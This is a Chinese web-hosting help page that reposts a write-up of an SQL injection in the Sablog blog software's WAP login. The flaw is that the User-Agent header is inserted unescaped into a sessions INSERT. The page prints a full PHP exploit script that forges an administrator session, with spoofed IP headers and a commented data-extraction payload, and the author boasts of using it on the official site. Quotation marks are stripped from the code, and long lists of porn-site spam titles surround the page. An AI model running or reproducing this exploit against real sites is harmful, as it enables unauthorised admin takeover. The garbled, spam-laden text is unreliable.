国产精品久久久久久久久久久新郎_91久久精品国产_国内精品久久久久久_欧美激情第一页在线观看_国产欧美日韩丝袜精品一区_日韩精品成人一区二区在线观看_国产精品v片在线观看不卡_91精品国产综合久久香蕉最新版 _国产精品亚洲激情_色综合男人天堂

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

php5 特性漏洞

發布時間:  2012/5/21 19:18:49

利用是PHP5,是因為_SERVER的變量不受引號的限制,即便是開啟了轉義
漏洞出在User-Agent
第二:insert into的多個數據插入
文中構造的地方就是
insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ($hash, ".$user[userid].", ".$user[groupid].", $iprand,,1),(9c5b71e5,1,1,211.43.206.202,9989581653, $timestamp);
MYSQL支持
insert into [admin] (name,pass) values (qq,bb),(aa,cc)
這樣的數據插入.
sablog是國內安全研究人員寫的一款blog程序,但是代碼中有一點瑕疵導致可能被獲取管理員權限:)
問題出在wap/index.php里的652行左右
------------
      $hash = getuserhash($user[userid], $user[username], $user[password], $user[logincount]+1);
      $DB->query("delete FROM {$db_prefix}sessions where uid=".$user[userid]." OR lastactivity+3600<$timestamp OR hash=$hash");
      $DB->query("insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ($hash, ".$user[userid].", ".$user[groupid].", $onlineip, ".$_SERVER[HTTP_USER_AGENT].", $timestamp)");
-------------
注意_SERVER變量是直接入庫的,存在一個insert類型的注射,我們通過這個漏洞測試過了官方,順利拿到了所有權限,呵呵.
這個地方要求是php5的,作者一時疏忽吧,貼出我們當時使用的exp
<?php
//from loveshell.net
$url = $argv[1]./wap/index.php;
$username = $argv[2];
$password = $argv[3];

echo"  +----------------------------------------------------------------+\r\n";
echo"      Uage: php.exe blogurl username password\r\n";
echo"      example  php.exe http://web.archive.org/web/20071217143209/http://www.loveshell.net/blog test test\r\n";
echo"  +----------------------------------------------------------------+\r\n";

if(!$username||!$password) die;
echo"  [email=root@localhost:Post]root@localhost:Post[/email] our content\r\n";
$str = username=.$username.&password=.$password.&action=login&do=login&;
$msg = myrequest($str,$url);
echo $msg;
if(strpos($msg,登陸成功)!==false) echo"  [email=root@localhost:All]root@localhost:All[/email] Done!!! \r\n";
else echo"  [email=root@localhost:Login]root@localhost:Login[/email] error!!! \r\n";
echo"  +----------------------------------------------------------------+\r\n";
echo"  Enjoy yourself.\r\n";
echo"  +----------------------------------------------------------------+\r\n";

function myrequest($msg,$url,$type=2,$cookie=){
//change type for post/get
  global $sql;
$urls = initurl($url);
$iprand = rand(1,255)...rand(1,255)...rand(1,255)...rand(1,255);
$fp = @fsockopen($urls[host], $urls[port], $errno, $errstr, 3);
  if($fp) {
    if($type==1){
      fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n");
      fputs($fp, "Host: $urls[host]\r\n");
      fputs($fp, "Accept: */*\r\n");
      fputs($fp, "Referer: $urls[url]\r\n");
      fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n");
      fputs($fp, "CLIENT_IP: $iprand\r\n");
      fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
      fputs($fp, "Pragma: no-cache\r\n");
      fputs($fp, "Cache-Control: no-cache\r\n");
      fputs($fp, "Connection: Keep-Alive\r\n");
      fputs($fp, "Cookie: $cookie\r\n\r\n");
    }else{
      fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n");
      fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");
      fputs($fp, "Referer: $urls[url]\r\n");
      fputs($fp, "Accept-Language: zh-cn\r\n");
      fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
//      fputs($fp, "User-Agent: ,1),((select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,211.43.206.208,123\r\n");
      fputs($fp, "User-Agent: ,1),(9c5b71e5,1,1,211.43.206.202,9989581653\r\n");
      fputs($fp, "CLIENT_IP: $iprand\r\n");
      fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
      fputs($fp, "Host: $urls[host]\r\n");
      fputs($fp, "Content-Length: ".strlen($msg)."\r\n");
      fputs($fp, "Connection: Keep-Alive\r\n");
      fputs($fp, "Cache-Control: no-cache\r\n");
      fputs($fp, "Cookie: $cookie\r\n\r\n");
      fputs($fp, $msg."\r\n");
    }
  }

while($fp&&!feof($fp)) {
$resp .= fread($fp,1024);
}
return $resp;
}

function initurl($url) {
$newurl = ;
$blanks = array(url=>);
$urls = $blanks;

if(strlen($url)<10) return $blanks;
$urls = @parse_url($url);
if(empty($urls) || !is_array($urls)) return $blanks;
if(empty($urls[scheme])) return $blanks;
if($urls[scheme] == file) return $blanks;
$newurl .= $urls[scheme].://;
$newurl .= empty($urls[user])?:$urls[user];
$newurl .= empty($urls[pass])?::.$urls[pass];
$newurl .= empty($urls[host])?:((!empty($urls[user]) || !empty($urls[pass]))?@:).$urls[host];
$newurl .= empty($urls[port])?::.$urls[port];
$newurl .= empty($urls[path])?:$urls[path];
$newurl .= empty($urls[query])?:?.$urls[query];
$newurl .= empty($urls[fragment])?:#.$urls[fragment];
$urls[port] = empty($urls[port])?80:$urls[port];
$urls[url] = $newurl;

return $urls;
}
?>


這次還是比較有意思的,起碼有以前沒有出現過的知識點在3個以上,另外sablog的加密認證方式很薄弱,加上這個注射可以進后臺的,作者需要改下哦.怕出問題的用戶把wap禁用吧,exp的含義我就不分析了,仔細分析的話會有很有意思的東西哦.....

億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.czbl888.cn】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    国产精品久久久久久久久久久新郎_91久久精品国产_国内精品久久久久久_欧美激情第一页在线观看_国产欧美日韩丝袜精品一区_日韩精品成人一区二区在线观看_国产精品v片在线观看不卡_91精品国产综合久久香蕉最新版 _国产精品亚洲激情_色综合男人天堂
    北条麻妃69av| 亚洲中文字幕无码不卡电影| 国产精品999视频| 91国在线高清视频| 麻豆映画在线观看| 国产 国语对白 露脸| 成人国产一区二区三区| 国产免费一区二区三区四在线播放 | 亚洲综合欧美激情| 亚洲第一狼人区| 天天色综合天天色| 激情五月俺来也| www.com久久久| 91制片厂免费观看| 日本免费a视频| 欧美丰满熟妇bbbbbb百度| 97xxxxx| www.日本一区| 超碰91在线播放| www.欧美黄色| 免费在线激情视频| 在线观看国产福利| 国产日韩欧美大片| 久在线观看视频| 欧美午夜性生活| 国产高清av片| 国产日本在线播放| 国产真实乱子伦| 国产精品v日韩精品v在线观看| 亚洲自拍第三页| 免费看欧美一级片| 日韩在线xxx| 亚洲另类第一页| www.黄色网址.com| 日韩欧美亚洲天堂| 日本在线播放一区二区| 狠狠噜天天噜日日噜| 日本免费黄视频| 精品久久久噜噜噜噜久久图片 | 777久久精品一区二区三区无码| av女优在线播放| 可以免费在线看黄的网站| 女同激情久久av久久| 免费的一级黄色片| 成人在线观看a| 老头吃奶性行交视频| 国产精品一二三在线观看| 成人免费在线视频播放| 免费观看日韩毛片| 亚洲妇熟xx妇色黄蜜桃| 97碰在线视频| www.天天射.com| 国产精品久久成人免费观看| 狠狠干 狠狠操| 在线观看三级网站| 777精品久无码人妻蜜桃| 九九九九九九九九| 黄色网页免费在线观看| 国产三级生活片| 免费看又黄又无码的网站| 欧美午夜精品理论片| 精品无码一区二区三区在线| 中文字幕日韩综合| 欧美视频在线播放一区| 免费看av软件| 国产精品人人妻人人爽人人牛| 欧美一级免费在线观看| 日韩中文字幕免费在线| 少妇一晚三次一区二区三区| 日韩av在线中文| 国产亚洲精品网站| 久久视频免费在线| 婷婷六月天在线| 少妇高潮喷水在线观看| 日本特级黄色大片| 亚洲精品高清无码视频| 黄色大片中文字幕| 免费观看中文字幕| 91亚洲免费视频| 成人午夜视频免费在线观看| 韩国无码av片在线观看网站| www.久久久久久久久久久| 免费日韩视频在线观看| 成人黄色大片网站| 超碰97在线看| 91看片破解版| 蜜桃免费在线视频| 日韩精品视频一区二区在线观看| 欧美做暖暖视频| 精品一区二区成人免费视频| 久久这里只精品| 美女黄色片视频| 日本黄网站免费| 亚洲 高清 成人 动漫| 欧美中日韩在线| 国产专区在线视频| 91九色国产ts另类人妖| 99久久99精品| 午夜av中文字幕| www.这里只有精品| 日本美女高潮视频| 欧美亚洲日本在线观看| 国产精品亚洲αv天堂无码| 精品视频免费在线播放| 免费看欧美黑人毛片| 欧美交换配乱吟粗大25p| 26uuu成人| 色中文字幕在线观看| av动漫免费看| 成人黄色大片网站| 高清欧美精品xxxxx| www.国产在线视频| 欧美视频在线观看视频| 免费看黄在线看| 国产av人人夜夜澡人人爽麻豆| 97免费视频观看| 欧美激情视频免费看| 精品国产一区三区| 男人日女人下面视频| 无码aⅴ精品一区二区三区浪潮 | 五月婷婷深爱五月| 日本xxxx黄色| 天美一区二区三区| 国产精品12p| 国产香蕉一区二区三区| 国产91视频一区| 国产婷婷一区二区三区| 色综合av综合无码综合网站| 在线视频日韩一区| 婷婷激情小说网| 欧美国产视频一区| 国产a级一级片| 五月天亚洲视频| 亚洲免费在线播放视频| 免费观看亚洲视频| 亚洲欧洲日产国码无码久久99| 国产视频在线视频| 91aaa精品| 亚洲色成人www永久在线观看| 北条麻妃在线视频观看| 免费看污污网站| 中国老女人av| 精品国产免费av| 奇米视频888| 干日本少妇视频| 欧美三级一级片| 国产永久免费网站| 日本一区午夜艳熟免费| 男女av免费观看| www.成年人| 全黄性性激高免费视频| 国产天堂在线播放| 法国空姐在线观看免费| 日日摸日日碰夜夜爽av| 97超碰人人爽| 亚洲精品蜜桃久久久久久| www日韩视频| 日日噜噜夜夜狠狠久久丁香五月 | 欧美精品99久久| 免费网站在线观看黄| 欧美一区二区视频在线播放| 欧美日韩亚洲一二三| 国产麻豆电影在线观看| 国产主播在线看| 最近中文字幕免费mv| 成人三级视频在线播放| 男人天堂成人网| 动漫av网站免费观看| 青娱乐国产精品视频| 黄色片视频在线免费观看| 色偷偷中文字幕| 亚洲中文字幕久久精品无码喷水 | 亚洲视频一二三四| 分分操这里只有精品| 日韩欧美国产片| 激情深爱综合网| 91免费视频黄| 亚洲视频在线观看一区二区三区| 91免费视频黄| 污视频网站观看| 国产二区视频在线播放| 成人污网站在线观看| jizzzz日本| 午夜肉伦伦影院| 成年人视频大全| 中文字幕第88页| 国产欧美在线一区| 大西瓜av在线| 夜夜爽久久精品91| 波多结衣在线观看| 青青草原av在线播放| 嫩草影院中文字幕| 成人手机视频在线| 亚洲久久中文字幕| 国产极品美女高潮无套久久久| 久久在线中文字幕| 一级黄色片播放| 999这里有精品| 一级在线免费视频| 999精品网站|